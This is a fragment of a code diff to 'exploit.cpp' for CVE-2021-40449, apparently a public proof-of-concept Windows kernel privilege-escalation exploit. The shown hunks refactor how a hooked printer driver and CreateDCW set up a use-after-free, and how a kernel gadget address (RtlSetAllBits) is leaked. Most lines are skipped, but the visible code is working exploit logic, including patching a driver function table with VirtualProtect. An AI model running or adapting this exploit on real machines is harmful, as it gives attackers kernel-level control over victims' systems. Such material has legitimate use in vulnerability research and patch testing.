■ ■ ■ ■ ■ ■
CVE-2021-40449/exploit.cpp
| skipped 34 lines |
| 35 | 35 | | rtlSetAllBits_address = leak_gadget_address(); |
| 36 | 36 | | cout << "rtlSetAllBits() on ring0 @ 0x" << hex << rtlSetAllBits_address << endl; |
| 37 | 37 | | |
| 38 | | - | setup_hook(); |
| 39 | | - | |
| 40 | | - | if (!(uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL))) |
| | 38 | + | if (!setup_hook()) |
| 41 | 39 | | goto error; |
| 42 | 40 | | |
| 43 | 41 | | uaf = TRUE; |
| skipped 7 lines |
| 51 | 49 | | |
| 52 | 50 | | error: |
| 53 | 51 | | cout << "error @ main()" << endl; |
| | 52 | + | system("pause"); |
| 54 | 53 | | return 1; |
| 55 | 54 | | } |
| 56 | 55 | | |
| skipped 103 lines |
| 160 | 159 | | goto error; |
| 161 | 160 | | return (DWORD64)drivers[0]; |
| 162 | 161 | | error: |
| 163 | | - | cout << "[!] error @ leak_kernel_base_address()" << endl; |
| | 162 | + | cout << "[!] error @ leak_module_base_kernel()" << endl; |
| 164 | 163 | | return FALSE; |
| 165 | 164 | | } |
| 166 | 165 | | |
| skipped 143 lines |
| 310 | 309 | | DrvDisableDriver(); |
| 311 | 310 | | if (!VirtualProtect(DRVENABLEDATA_ptr.pdrvfn, DRVENABLEDATA_ptr.c * sizeof(PFN), lpflOldProtect, &lpflOldProtect)) |
| 312 | 311 | | goto error; |
| 313 | | - | |
| | 312 | + | uaf_hdc = CreateDCW(NULL, hooked_printer_name, NULL, NULL); |
| | 313 | + | if (uaf_hdc) { |
| | 314 | + | return TRUE; |
| | 315 | + | } |
| 314 | 316 | | LocalFree((HLOCAL)printers); |
| 315 | 317 | | LocalFree((HLOCAL)driver_info); |
| 316 | | - | return TRUE; |
| | 318 | + | |
| 317 | 319 | | } |
| 318 | 320 | | error: |
| 319 | 321 | | printers&& LocalFree((HLOCAL)printers); |
| skipped 98 lines |
